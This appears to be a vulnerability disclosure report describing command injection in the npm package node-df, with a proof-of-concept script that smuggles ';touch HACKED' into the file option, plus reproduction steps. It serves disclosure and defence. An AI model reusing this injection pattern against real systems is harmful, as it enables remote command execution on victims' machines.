I would like to report a RCE issue in the node-df module.
It allows to execute arbitrary commands remotely inside the victim's PC

Module

module name: node-dfversion:0.1.4npm page: https://www.npmjs.com/package/node-df

Module Description

> node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df.

Module Stats

[N/A] downloads in the last day
[3,023] downloads in the last week
[N/A] downloads in the last month

Vulnerability Description

The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here:

Steps To Reproduce:

1. Create the following PoC file:

// poc.js
var df = require('node-df');
var options = {
        file: '/;touch HACKED',
        prefixMultiplier: 'GB',
        isDisplayPrefixMultiplier: true,
        precision: 2
    };
 
df(options, function (error, response) {
    if (error) { throw error; }
 
    console.log(JSON.stringify(response, null, 2));
});

1. Execute the following commands in terminal:

npm i node-df # Install affected module
ls # Make sure there isn't any *HACKED* file
node poc.js #  Run the PoC
ls # The *HACKED* file has been created

1. The HACKED file will be created {F594172}

Patch

> Don’t concatenate commands using insecure user's inputs :)

Supporting Material/References:

• [OPERATING SYSTEM VERSION]: Kali Linux

Wrap up

• I contacted the maintainer to let them know: [N]
• I opened an issue in the related repository: [N]

Impact

RCE on node-df via insecure command concatenation